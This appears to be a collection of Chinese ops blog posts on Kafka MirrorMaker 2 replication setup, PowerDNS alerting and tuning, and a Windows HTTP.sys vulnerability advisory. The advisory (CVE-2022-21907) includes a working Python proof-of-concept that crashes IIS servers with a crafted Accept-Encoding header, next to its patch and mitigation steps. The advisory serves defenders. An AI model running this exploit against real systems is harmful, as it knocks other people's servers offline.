云迁移或混合云部署
法律和合规要求

管理员可以使用 Kafka 的 MirrorMaker（版本 2）设置此类集群间数据流，这是一种以流式传输方式在不同 Kafka 环境之间复制数据的工具。MirrorMaker 构建在 Kafka Connect 框架之上，支持以下功能：

复制主题（数据加配置）
复制消费者组，包括在集群之间迁移应用程序的偏移量
复制 ACL
保留分区
自动检测新主题和分区
提供广泛的指标，例如跨多个数据中心/集群的端到端复制延迟
容错和水平可扩展的操作

注意：使用 MirrorMaker 进行异地复制可跨 Kafka 集群复制数据。这种集群间复制与 Kafka 的集群内复制不同，后者在同一个 Kafka 集群内复制数据。

什么是复制流

借助 MirrorMaker，Kafka 管理员可以将主题、主题配置、消费者组及其偏移量以及 ACL 从一个或多个源 Kafka 集群复制到一个或多个目标 Kafka 集群，即跨集群环境。简而言之，MirrorMaker 使用连接器从源集群进行消费并生产到目标集群。

这些从源集群到目标集群的定向流称为复制流。它们是使用 MirrorMaker 配置文件中的格式定义的，{source_cluster}->{target_cluster}如下所述。管理员可以根据这些流程创建复杂的复制拓扑。

以下是一些示例模式：

主动/主动高可用性部署：A->B, B->A
主动/被动或主动/备用高可用性部署：A->B
聚合（例如，从多个集群到一个集群）：A->K, B->K, C->K
扇出（例如，从一个集群到多个集群）：K->A, K->B, K->C
转发：A->B, B->C, C->D

默认情况下，流会复制所有主题和消费者组。但是，每个复制流都可以独立配置。例如，您可以定义仅将特定主题或消费者组从源集群复制到目标集群。

环境准备

source集群：kafka-3.1.1、3台虚拟机

target集群：kafka-3.1.1、3台虚拟机

工具：connect-mirror-maker.sh

部署jdk环境、zookeeper集群、kafka集群

#注意： 查看客户端版本号要与集群的版本对应，否则会出现警告等报错信息wget --no-check-certificate https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/stable/apache-zookeeper-3.6.3-bin.tar.gzmkdir /usr/local/zookeepertar zxf apache-zookeeper-3.6.3-bin.tar.gz -C /usr/local/zookeepercd /usr/local/zookeeper/apache-zookeeper-3.6.3-bin/scp /root/apache-zookeeper-3.6.3-bin.tar.gz 10.7.0.78:/usr/local/scp /root/apache-zookeeper-3.6.3-bin.tar.gz 10.7.0.79:/usr/local/cat >> /etc/profile << 'EOF'export ZOOKEEPER_HOME=/usr/local/zookeeperEOFgroupadd zookeeperuseradd zookeeper  -g zookeepersource /etc/profileecho $ZOOKEEPER_HOMEcd /usr/local/zookeeper/confmv zoo_sample.cfg zoo.cfgcat > zoo.cfg << 'EOF'tickTime=2000initLimit=10syncLimit=5dataDir=/usr/local/zookeeper/datadataLogDir=/usr/local/zookeeper/logsclientPort=2181server.1=10.7.0.77:2888:3888server.2=10.7.0.78:2888:3888server.3=10.7.0.79:2888:3888EOFcd ..mkdir datamkdir logsecho '1' > data/myid#第二个节点需要改成2，第三个改成3echo '2' > data/myidscp conf/zoo.cfg 10.7.0.78:/usr/local/zookeeper/conf/scp conf/zoo.cfg 10.7.0.79:/usr/local/zookeeper/conf/chown -R zookeeper.zookeeper /usr/local/zookeeper/cat >> /usr/lib/systemd/system/zookeeper.service<<'EOF'[Unit]Description=zookeeper[Service]Type=forkingEnvironment=ZOO_LOG_DIR=/usr/local/zookeeper/logs/ExecStart=/usr/local/zookeeper/bin/zkServer.sh startExecStop=/usr/local/zookeeper/bin/zkServer.sh stopExecReload=/usr/local/zookeeper/bin/zkServer.sh restartRestart=alwaysUser=zookeeperGroup=zookeeperRestartSec=5OOMScoreAdjust=-1000StartLimitInterval=0StartLimitBurst=5[Install]WantedBy=multi-user.targetEOFchown -R zookeeper.zookeeper /usr/local/zookeepersystemctl daemon-reloadsystemctl enable --now zookeepersystemctl status zookeeper#查看状态bash $ZOOKEEPER_HOME/bin/zkServer.sh statusbash $ZOOKEEPER_HOME/bin/zkCli.sh -server 10.7.0.77:2181bash $ZOOKEEPER_HOME/bin/zkServer.sh status#部署kafka集群修改配置文件，注意修改logs目录、id号每个节点都是唯一的、监听地址：自身ip+9092cat >> /etc/profile <<'EOF'export JAVA_HOME=/usr/lib/jvm/adoptopenjdk-11-hotspot-amd64export JRE_HOME=${JAVA_HOME}/jreexport CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/libexport PATH=${JAVA_HOME}/bin:$PATHEOFsource /etc/profileecho $JAVA_HOMEmkdir /usr/local/kafkatar zxf kafka_2.13-3.1.1.tgz -C /usr/local/kafkacd /usr/local/kafka/mv kafka_2.13-3.1.1/* .rm -rf kafka_2.13-3.1.1/vim config/server.properties # Licensed to the Apache Software Foundation (ASF) under one or more# contributor license agreements.  See the NOTICE file distributed with# this work for additional information regarding copyright ownership.# The ASF licenses this file to You under the Apache License, Version 2.0# (the "License"); you may not use this file except in compliance with# the License.  You may obtain a copy of the License at##    http://www.apache.org/licenses/LICENSE-2.0## Unless required by applicable law or agreed to in writing, software# distributed under the License is distributed on an "AS IS" BASIS,# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.# See the License for the specific language governing permissions and# limitations under the License.# see kafka.server.KafkaConfig for additional details and defaults############################# Server Basics ############################## The id of the broker. This must be set to a unique integer for each broker.broker.id=1############################# Socket Server Settings ############################## The address the socket server listens on. It will get the value returned from # java.net.InetAddress.getCanonicalHostName() if not configured.#   FORMAT:#     listeners = listener_name://host_name:port#   EXAMPLE:#     listeners = PLAINTEXT://your.host.name:9092listeners=PLAINTEXT://10.7.0.80:9092# Hostname and port the broker will advertise to producers and consumers. If not set, # it uses the value for "listeners" if configured.  Otherwise, it will use the value# returned from java.net.InetAddress.getCanonicalHostName().advertised.listeners=PLAINTEXT://10.7.0.80:9092auto.create.topics.enable=falseunclean.leader.election.enable=falseauto.leader.rebalance.enable=falsequeued.max.requests=1000# Maps listener names to security protocols, the default is for them to be the same. See the config documentation for more details#listener.security.protocol.map=PLAINTEXT:PLAINTEXT,SSL:SSL,SASL_PLAINTEXT:SASL_PLAINTEXT,SASL_SSL:SASL_SSL# The number of threads that the server uses for receiving requests from the network and sending responses to the networknum.network.threads=6# The number of threads that the server uses for processing requests, which may include disk I/Onum.io.threads=8# The send buffer (SO_SNDBUF) used by the socket serversocket.send.buffer.bytes=102400# The receive buffer (SO_RCVBUF) used by the socket serversocket.receive.buffer.bytes=102400# The maximum size of a request that the socket server will accept (protection against OOM)socket.request.max.bytes=104857600############################# Log Basics ############################## A comma separated list of directories under which to store log fileslog.dirs=/usr/local/kafka/logs# The default number of log partitions per topic. More partitions allow greater# parallelism for consumption, but this will also result in more files across# the brokers.num.partitions=3# The number of threads per data directory to be used for log recovery at startup and flushing at shutdown.# This value is recommended to be increased for installations with data dirs located in RAID array.num.recovery.threads.per.data.dir=3############################# Internal Topic Settings  ############################## The replication factor for the group metadata internal topics "__consumer_offsets" and "__transaction_state"# For anything other than development testing, a value greater than 1 is recommended to ensure availability such as 3.offsets.topic.replication.factor=1transaction.state.log.replication.factor=1transaction.state.log.min.isr=1message.max.bytes=10485760default.replication.factor=3delete.topic.enable=true############################# Log Flush Policy ############################## Messages are immediately written to the filesystem but by default we only fsync() to sync# the OS cache lazily. The following configurations control the flush of data to disk.# There are a few important trade-offs here:#    1. Durability: Unflushed data may be lost if you are not using replication.#    2. Latency: Very large flush intervals may lead to latency spikes when the flush does occur as there will be a lot of data to flush.#    3. Throughput: The flush is generally the most expensive operation, and a small flush interval may lead to excessive seeks.# The settings below allow one to configure the flush policy to flush data after a period of time or# every N messages (or both). This can be done globally and overridden on a per-topic basis.# The number of messages to accept before forcing a flush of data to disk#log.flush.interval.messages=10000# The maximum amount of time a message can sit in a log before we force a flush#log.flush.interval.ms=1000############################# Log Retention Policy ############################## The following configurations control the disposal of log segments. The policy can# be set to delete segments after a period of time, or after a given size has accumulated.# A segment will be deleted whenever *either* of these criteria are met. Deletion always happens# from the end of the log.# The minimum age of a log file to be eligible for deletion due to agelog.retention.hours=168# A size-based retention policy for logs. Segments are pruned from the log unless the remaining# segments drop below log.retention.bytes. Functions independently of log.retention.hours.log.retention.bytes=1099511627776# The maximum size of a log segment file. When this size is reached a new log segment will be created.log.segment.bytes=1073741824# The interval at which log segments are checked to see if they can be deleted according# to the retention policieslog.retention.check.interval.ms=300000log.cleaner.enable=truelog.cleaner.threads=8############################# Zookeeper ############################## Zookeeper connection string (see zookeeper docs for details).# This is a comma separated host:port pairs, each corresponding to a zk# server. e.g. "127.0.0.1:3000,127.0.0.1:3001,127.0.0.1:3002".# You can also append an optional chroot string to the urls to specify the# root directory for all kafka znodes.zookeeper.connect=10.7.0.80:2181,10.7.0.81:2181,10.7.0.82:2181# Timeout in ms for connecting to zookeeperzookeeper.connection.timeout.ms=18000############################# Group Coordinator Settings ############################## The following configuration specifies the time, in milliseconds, that the GroupCoordinator will delay the initial consumer rebalance.# The rebalance will be further delayed by the value of group.initial.rebalance.delay.ms as new members join the group, up to a maximum of max.poll.interval.ms.# The default value for this is 3 seconds.# We override this to 0 here as it makes for a better out-of-the-box experience for development and testing.#创建日志目录mkdir /usr/local/kafka/logs -pchown -R zookeeper.zookeeper /usr/local/kafka#设置system启动cat > /lib/systemd/system/kafka.service <<'EOF'[Unit]Description=Apache Kafka server (broker)After=network.target zookeeper.service[Service]Type=forkingEnvironment=PATH=/usr/lib/jvm/adoptopenjdk-11-hotspot-amd64/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binExecStart=/usr/local/kafka/bin/kafka-server-start.sh -daemon /usr/local/kafka/config/server.properties ExecStop=/usr/local/kafka/bin/kafka-server-stop.shRestart=alwaysRestartSec=10StartLimitInterval=0LimitNOFILE=265535OOMScoreAdjust=-1000StartLimitBurst=5User=zookeeperGroup=zookeeper[Install]WantedBy=multi-user.targetEOFsystemctl daemon-reloadsystemctl enable --now kafkasystemctl status kafkajps#创建topic测试/usr/local/kafka/bin/kafka-topics.sh --create  --bootstrap-server 10.7.0.77:9092  --partitions 3 --replication-factor 3 --topic test#查看已有的topic/usr/local/kafka/bin/kafka-topics.sh --list --bootstrap-server 10.7.0.77:9092#先开启生产者，必须要已存在的topic，进入交互式，随便输入字符。然后在消费者端就会看到/usr/local/kafka/bin/kafka-console-producer.sh --bootstrap-server 10.7.0.77:9092 --topic test#创建消费者，进入交互式之后，能够实时看见生产者发出的消息，集群正常，验证结束/usr/local/kafka/bin/kafka-console-consumer.sh --bootstrap-server 10.7.0.78:9092 --topic test --from-beginning#连接Zookeeper进入交互模式，查看节点id/usr/local/kafka/bin/zookeeper-shell.sh  127.0.0.1:2181ls /brokers/ids[0, 1, 2]get /controller{"version":1,"brokerid":0,"timestamp":"1631005545929"}#开启JMX监控修改文件/usr/local/kafka/bin/kafka-server-start.sh  添加export JMX_PORT="9999"下面的代码if [ "x$KAFKA_HEAP_OPTS" = "x" ]; then    export KAFKA_HEAP_OPTS="-Xmx1G -Xms1G"    export JMX_PORT="9999"fi#然后重启kafka查看端口systemctl restart kafka.service ss -lntup

配置MM2异地复制

cat /usr/local/kafka/config/connect-mirror-maker.properties# Licensed to the Apache Software Foundation (ASF) under A or more# contributor license agreements.  See the NOTICE file distributed with# this work for additional information regarding copyright ownership.# The ASF licenses this file to You under the Apache License, Version 2.0# (the "License"); you may not use this file except in compliance with# the License.  You may obtain a copy of the License at# #    http://www.apache.org/licenses/LICENSE-2.0# # Unless required by applicable law or agreed to in writing, software# distributed under the License is distributed on an "AS IS" BASIS,# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.# See the License for the specific language governing permissions and# limitations under the License.# see org.apache.kafka.clients.consumer.ConsumerConfig for more details# Sample MirrorMaker 2.0 top-level configuration file# Run with ./bin/connect-mirror-maker.sh connect-mirror-maker.properties # specify any number of cluster aliasesclusters = cn-bl, cn-hz# connection information for each cluster# This is a comma separated host:port pairs for each cluster# for e.g. "A_host1:9092, A_host2:9092, A_host3:9092"cn-bl.bootstrap.servers = 10.7.0.77:9092, 10.7.0.78:9092, 10.7.0.79:9092cn-hz.bootstrap.servers = 10.7.0.80:9092, 10.7.0.81:9092, 10.7.0.82:9092# enable and configure individual replication flowscn-bl->cn-hz.enabled = true# regex which defines which topics gets replicated. For eg "foo-.*"cn-bl->cn-hz.topics = .*#cn-hz->cn-bl.enabled = true#cn-hz->cn-bl.topics = .*# Setting replication factor of newly created remote topicsreplication.factor=3############################# Internal Topic Settings  ############################## The replication factor for mm2 internal topics "heartbeats", "B.checkpoints.internal" and# "mm2-offset-syncs.B.internal"# For anything other than development testing, a value greater than 1 is recommended to ensure availability such as 3.sync.topic.configs.enabled.interval.seconds = 5checkpoints.topic.replication.factor = 2heartbeats.topic.replication.factor = 2offset-syncs.topic.replication.factor = 2tasks.max = 5# The replication factor for connect internal topics "mm2-configs.B.internal", "mm2-offsets.B.internal" and# "mm2-status.B.internal"# For anything other than development testing, a value greater than 1 is recommended to ensure availability such as 3.offset.storage.replication.factor = 2status.storage.replication.factor = 2config.storage.replication.factor = 2# customize as needed# replication.policy.separator = _# sync.topic.acls.enabled = false# emit.heartbeats.interval.seconds = 5sync.topic.acls.enabled = trueemit.heartbeats.interval.seconds = 5sync.group.offsets.enabled``__consumer_offsets = trueheartbeats.topic.retention.ms = 1000checkpoints.topic.retention.ms = 1000#设置同步的topic Name命名规则；3.0版本提供了两种topic同步命名规则，默认会带上前缀,也可以手动不带前缀的----此时不能做双向同步，灾备模式建议使用这个，两边机房集群的topic名字一致replication.policy.class = org.apache.kafka.connect.mirror.IdentityReplicationPolicy#添加systemd托管启动cat >> /lib/systemd/system/kafka-mirror-maker.service << 'EOF'[Unit]Description=Kafka Mirror MakerAfter=network.target[Service]Type=simpleExecStart=/usr/local/kafka/bin/connect-mirror-maker.sh /usr/local/kafka/config/connect-mirror-maker.propertiesExecStop=/bin/kill $MAINPIDExecReload=/bin/kill -s HUP $MAINPIDRestart=alwaysRestartSec=10StartLimitInterval=0LimitNOFILE=265535OOMScoreAdjust=-1000StartLimitBurst=5[Install]WantedBy=multi-user.targetEOFsystemctl daemon-reloadsystemctl enable --now kafka-mirror-maker.service#启动mm2之后，测试验证同步是否正常。默认目标集群的topic是带有源集群名字前缀的，所以源集群topic名字为：jette-test，那么目标集群的topic名字为：cn-bl.jette-test。所以在源集群jette-test的topic生产消息，那么在目标集群就需要在cn-bl.jette-test这个topic消费消息。topic对不上肯定是无法消费到消息的，主题要一致！#如果只是单向同步的需求，配置文件可以将带有集群名字的前缀topic去掉，目标集群的topic就跟源集群的topic名字一样了。见下图：

验证MM2的同步效果

#源集群创建topic/usr/local/kafka/bin/kafka-topics.sh --create  --bootstrap-server 10.7.0.77:9092  --partitions 3 --replication-factor 3 --topic jette-test#目标集群查看topic/usr/local/kafka/bin/kafka-topics.sh --list --bootstrap-server 10.7.0.80:9092__consumer_offsetscn-bl.checkpoints.internalcn-bl.heartbeatsheartbeatsjette-testjette-test-01mm2-configs.cn-bl.internalmm2-offset-syncs.cn-bl.internalmm2-offsets.cn-bl.internalmm2-status.cn-bl.internal#源集群生产/usr/local/kafka/bin/kafka-console-producer.sh --bootstrap-server 10.7.0.77:9092 --topic jette-test#目标集群消费。消费者刚打开会有延迟需要等一会才显示/usr/local/kafka/bin/kafka-console-consumer.sh --bootstrap-server 10.7.0.80:9092 --topic jette-test --from-beginning

下图为MM2异地复制验证成功举例：

Windows远程代码执行漏洞CVE-2022-21907

2023-12-17T13:32:13+08:00

漏洞概述

未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包，从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”，无需用户交互便可通过网络进行自我传播，CVSS评分为9.8。目前已发现可造成目标主机蓝屏崩溃的漏洞利用出现，请相关用户尽快采取措施进行防护。

Windows HTTP 协议栈（HTTP.sys）是Windows操作系统中处理HTTP请求的内核驱动程序，常见于Web浏览器与 Web 服务器之间的通信，以及Internet Information Services (IIS)中。

风险等级

高危

易受攻击的系统

受影响版本：

Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

不受影响版本

Windows 10 version 1909
Windows Server 2019（默认配置不受影响）
Windows 10 version 1809（默认配置不受影响）

漏洞利用

POC

#Windows机器先安装python环境，下载安装包即可。安装的时候勾选自动添加变量https://www.python.org/downloads/windows/    #!/usr/bin/env python3import argparseimport datetimeimport requestsimport timeimport threadingdef parseArgs():    parser = argparse.ArgumentParser(description="Description message")    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')    return parser.parse_args()def monitor_thread(target, dtime=5):    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)    for k in range(dtime):        try:            r = requests.get(target, timeout=1)        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:            print("   [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))        else:            print("   [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))            time.sleep(1)if __name__ == '__main__':    options = parseArgs()    if not options.target.startswith('http://') and not options.target.startswith('https://'):        target = "http://" + options.target    else:        target = options.target    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'    # Starting monitoring thread    t = threading.Thread(target=monitor_thread, args=(target,))    t.start()    time.sleep(2)    # Sending payload    print("   [+] Sending payload ...")    try:        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:        t.join()        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))    # Cleanup    t.join()        python CVE-2022-21907.py -t x.x.x.x

蓝屏后重启可恢复

漏洞防护

补丁更新

目前微软官方已针对受支持的产品版本发布了修复以上漏洞的安全补丁，强烈建议受影响用户尽快安装补丁进行防护，官方下载链接：
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907
注：由于网络问题、计算机环境问题等原因，Windows Update的补丁更新可能出现失败。用户在安装补丁后，应及时检查补丁是否成功更新。
右键点击Windows图标，选择“设置(N)”，选择“更新和安全”-“Windows更新”，查看该页面上的提示信息，也可点击“查看更新历史记录”查看历史更新情况。
针对未成功安装的更新，可点击更新名称跳转到微软官方下载页面，建议用户点击该页面上的链接，转到“Microsoft更新目录”网站下载独立程序包并安装。

临时防护措施

若使用Windows Server 2019和Windows 10 version
1809版本的用户暂时无法安装补丁，可使用下列措施进行临时缓解：
在DWORD注册表中删除“EnableTrailerSupport”可防护此漏洞的攻击，“EnableTrailerSupport”的路径为：HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters
注：当用户通过EnableTrailerSupport注册表值启用了HTTP Trailer
Support时，以上版本才受该漏洞影响，默认配置时不受该漏洞影响。

PowerDNS-Recursor与Authoritative的Prometheus告警规则—全网唯一

2023-12-09T19:39:04+08:00

PDNS-Recursor递归器的告警规则

groups:- name: powerdns-recursor.rules  rules:  - alert: DNS Recursor Down    expr: powerdns_recursor_up == 0    for: 2m    labels:      severity: critical      cluster_name: PowerDNS-Recursor-DEV&STG    annotations:      summary: "DNS Recursor Down"      description: "DNS Recursor Down, indicates a recursion fault."  - alert: DNS Query Rate Alert    expr: rate(powerdns_recursor_incoming_queries_total[5m]) > 1500    for: 2m    labels:      severity: warning      cluster_name: PowerDNS-Recursor-DEV&STG    annotations:      summary: "High DNS Query Rate detected"      description: "The rate of incoming DNS queries over UDP is very high, qps over 1500, indicating potential abnormal traffic or a DDoS attack."  - alert: DNS Incoming Queries TCP Alert    expr: rate(powerdns_recursor_incoming_queries_total{net="tcp"}[5m]) > 100    for: 5m    labels:      severity: warning      cluster_name: PowerDNS-Recursor-DEV&STG    annotations:      summary: "High rate of incoming TCP DNS queries detected"      description: "The rate of incoming DNS queries over TCP is very high, qps over 100, indicating potential issues with UDP traffic handling."  - alert: DNS Cache Miss Alert    expr: |      (        100 * sum(rate(powerdns_recursor_cache_lookups_total{result="hit",job="PowerDNS-Recursor-DEV&STG"}[5m]))         /        (          sum(rate(powerdns_recursor_cache_lookups_total{result="hit",job="PowerDNS-Recursor-DEV&STG"}[5m]))           +          sum(rate(powerdns_recursor_cache_lookups_total{result="miss",job="PowerDNS-Recursor-DEV&STG"}[5m]))        )      ) < 15    for: 5m    labels:      cluster_name: PowerDNS-Recursor-DEV&STG      severity: critical    annotations:      summary: "High DNS Cache Miss Rate detected"      description: "The percentage of DNS cache misses is high,The percentage of cache hit requests is under 15% in the last 5 minutes, indicating potential performance issues or DNS resolution problems."    - alert: DNS Response Time Outliers    expr: histogram_quantile(0.95, sum by (le) (rate(powerdns_recursor_response_time_seconds_bucket[5m]))) > 1    for: 5m    labels:      cluster_name: PowerDNS-Recursor-DEV&STG      severity: warning    annotations:      summary: "High DNS Response Time outliers detected"      description: "The 95th percentile of DNS response times is higher than expected,DNS recursive response time is greater than 1000 ms, indicating potential performance issues or network latency problems."

PDNS-Authoritative权威服务器的告警规则

groups:- name: powerdns_authoritative_alerts  rules:  - alert: DNS Query Rate Increase    expr: rate(powerdns_authoritative_queries_total[5m]) > 1000    for: 5m    labels:      cluster_name: PowerDNS-Authoritative-DEV&STG      severity: warning    annotations:      summary: "High DNS query rate detected"      description: "The rate of DNS queries has exceeded the threshold of 1000 queries per second for the past 5 minutes."  - alert: PowerDNS Status of the authorization server    expr: powerdns_authoritative_up == 0    for: 5m    labels:      cluster_name: PowerDNS-Authoritative-DEV&STG      severity: critical    annotations:      summary: "PowerDNS Authoritative server down"      description: "PowerDNS Authoritative server down."        - alert: High Cpu Milliseconds User    expr: rate(powerdns_authoritative_cpu_milliseconds{type="user"}[5m]) > 100    for: 5m    labels:      cluster_name: PowerDNS-Authoritative-DEV&STG      severity: critical    annotations:      summary: "High CPU milliseconds in user space"      description: "The number of CPU milliseconds spent in user space in the PowerDNS Authoritative server has increased significantly. The average CPU millisecond in five minutes is over 100 milliseconds. This may indicate a potential performance issue that needs investigation."  - alert: High Cpu Milliseconds Sys    expr: rate(powerdns_authoritative_cpu_milliseconds{type="sys"}[5m]) > 100    for: 5m    labels:      cluster_name: PowerDNS-Authoritative-DEV&STG      severity: critical    annotations:      summary: "High CPU milliseconds in kernel space"      description: "The number of CPU milliseconds spent in kernel space in the PowerDNS Authoritative server has increased significantly. The average CPU millisecond in five minutes is over 100 milliseconds. This may indicate a potential performance issue that needs investigation."  - alert: UDP NoPort Errors    expr: increase(powerdns_authoritative_exceptions_total{error="udp_noport_errors"}[5m]) > 0    for: 5m    labels:      cluster_name: PowerDNS-Authoritative-DEV&STG      severity: critical    annotations:      summary: "UDP no port errors detected"      description: "Errors related to UDP no port have been detected in the past 5 minutes."  - alert: Process Memory Usage Increase    expr: (process_resident_memory_bytes{job="PowerDNS-Authoritative-DEV&STG"} / 1024 / 1024) > 1000    for: 5m    labels:      cluster_name: PowerDNS-Authoritative-DEV&STG      severity: warning    annotations:      summary: "High process memory usage detected"      description: "The resident memory size of the PowerDNS process has exceeded 1000 MB for the past 5 minutes."

PowerDNS-Authoritative与Recursor架构介绍性能调优

2023-12-03T18:29:45+08:00

PowerDNS架构图：

PowerDNS 的特点

PowerDNS 和 BIND 一样，都是 DNS 服务软件。

PowerDNS 比较大的特色在于它把权威解析和递归解析的能力拆解开来分为两个服务，负责权威解析的是 pdns authoritative server ，负责递归解析的是 pdns recursor server 。我认为这种拆解是有利的，它将不同的解析流量区分，排查问题时会更方便，对后续的性能瓶颈分析也是有利的。

PowerDNS 支持各种各样的后端，可以是文件系统，也可以是通用关系型数据库，虽然 BIND 可以通过 DLZ 来实现关系型数据库作为记录的存储后端，但从支持的后端多样性来看，明显是 PowerDNS 更丰富。

PowerDNS 内置 Web Server 实现了 API 支持和监控系统，可以进行实时数据监控和动态更新记录，而 BIND 虽然也有相关的统计信息输出，但是这部分功能明显逊色于 PowerDNS 。

PowerDNS 的搭建和配置都相对简单，这里只记录一些调优过程的思考。

Authoritative Server 的性能调优

我们需要先了解 Authoritative Server 中重要的缓存种类：

Packet Cache ：数据包缓存，可以无需做任何额外处理，直接响应查询请求的数据缓存。
Query Cache ：执行后端查询后，后端查询到的数据库记录缓存。
Negative Cache ：在 Query Cache 中，请求信息无法在后端查询到记录的数据缓存。

其实可以直接地认为是两种缓存， Packet Cache 是对请求回答数据的缓存， Query Cache 和 Negative Cache 都是对数据库记录的缓存，通常我们希望直接返回 Packet Cache ，这会是最快最节省资源的响应办法。如果确实无法直接命中，则应该优先在 Query Cache 部分寻找命中，可以节省对数据库的查询行为。在这一部分， Negative Cache 和常规 Query Cache 的命中都是同样的，只是这个请求是否能得到回答数据的区别而已。

关于缓存部分，性能优化的调节点是在于缓存时间和缓存条数，我们可以把默认的 Packet Cache 的缓存时间略微提高一些，它在配置文件中以 cache-ttl 出现，默认时间为 20s ，这个值可以调高至 60s 。

Query Cache 的缓存时间在配置文件中以 query-cache-ttl 出现，默认时间为 20s ，这个值也可以和 cache-ttl 一样调高到 60s 。

Negative Cache 的缓存时间在配置文件中以 negquery-cache-ttl 出现，默认时间为 60s ，由于它和 Query Cache 类似，可以保持和 query-cache-ttl 一致的 60s 。

要注意调节缓存时间能起到性能优化的前提是使用关系型数据库作为后端，如果是文件系统或者是基于内存的后端存储，这些缓存时间需要额外考量，甚至可以直接禁用缓存，因为它们的响应速度足够快，缓存反而会成为性能的拖累。

另一个性能优化的调节点在于对工作线程的调节，在 Authoritative Server 中有 receiver thread 和 distributor thread 的概念。

receiver thread 是用于接收请求的线程，它的线程数可以自由调节，但要达到优化性能，这个数量应该适中，最好是和 CPU 数量成倍数关系。它在配置中以 receiver-threads 出现，默认值是 1 。

distributor thread 是 receiver thread 接收请求后，用于处理这些请求的线程，主要担任查询工作。它在配置中以 distributor-threads 出现，默认值是 3 。

需要注意的是这里 distributor-threads 是每个 receiver thread 所关联的线程数量，也就是说一个 receiver thread 可以对应一个或多个 distributor thread ，这个值应该由使用的后端类型决定，如果只有单个关系型数据库作为后端，那么 distributor-threads 为 1 应该是最优的做法，但如果使用了多个后端数据库，设置较大的 distributor-threads 可以得到更好的性能。

然后是配置中的 reuseport 这个特性开关，它是通过启用内核的 SO_REUSEPORT 选项来使得多个套接字可以在同个端口监听，如果内核版本过低不支持 SO_REUSEPORT ，那么不管这个选项如何设置，它都是默认关闭的。

设置多个 receiver thread 和开启 reuseport 的两者组合应该是最佳性能的工作方式，这样内核会将请求均衡到各个 receiver thread 中，获取比较好的性能表现。

最终的优化配置大概如下：

# 假设是 4 核机器，单个 MySQL 作为 backend$ cat pdns.confcache-ttl=60query-cache-ttl=60negquery-cache-ttl=60distributor-threads=1receiver-threads=4reuseport=yes

Recursor Server 的性能调优

Recursor Server 同样有着多个缓存种类：

Nameserver Speeds Cache ：对所有远端权威服务器的平均延迟时间的缓存。
Negative Cache ：对无响应数据请求的缓存。
Recursor Cache ：对递归过程一些公共记录信息的缓存。
Packet Cache ：数据包缓存，可以无需做任何额外处理，直接响应查询请求的数据缓存。

在递归服务器中，各类缓存的 ttl 已经被默认设置为较高值，所以这部分并没有对它们做额外调节，更多的优化细节在于工作线程这一方面。

Recursor Server 的 threads 和 Authoritative Server 的 receiver threads 类似，是处理具体请求的线程，但它不负责具体的后端查询工作。

但在 Recursor Server 中还是有 distributor thread 的概念，它负责将请求分发到 thread 中，按照官方的说法，使用 distributor thread 可以提高缓存的命中率。但以实际测试情况来看，在原有 Packet Cache 命中率就很高的情况下，开启 distributor thread 会导致实际工作的 thread 负载不均衡，而缓存命中率只是略有提高。

所以实际使用中，较好的做法是禁用 distributor thread 和开启 reuseport 特性，由内核去把请求分配到 thread 中，并且使用 cpu-map 来把 thread 和具体的 CPU 绑定，有助于缓存的就近访问，提高响应的速度。

最终的优化配置大概如下：

# 假设是 4 核机器，单个 MySQL 作为 backend$ cat pdns.confthreads=4pdns-distributes-queries=noreuseport=yescpu-map=0=0 1=1 2=2 3=3

Deng Yongjie's blog

Nginx和APISIX多级代理如何获取客户端真实IP地址—全网最详细

问题一：SSL单向认证，一级代理和二级代理无法正常进行握手，因此访问时在一级代理会出现502状态码

单向认证

debug error访问日志

access 访问日志

问题二：4层透明代理，无法透传XFF头，所以二级代理获取的IP地址是一级代理的IP，无法获取客户端真实IP

解决方案

通常使用的架构

如果需要采用问题一的链路架构方案，如何解决此问题？重点！

一级代理nginx配置文件

参数详解

二级代理apisix修改配置

验证结果

深入抓包验证

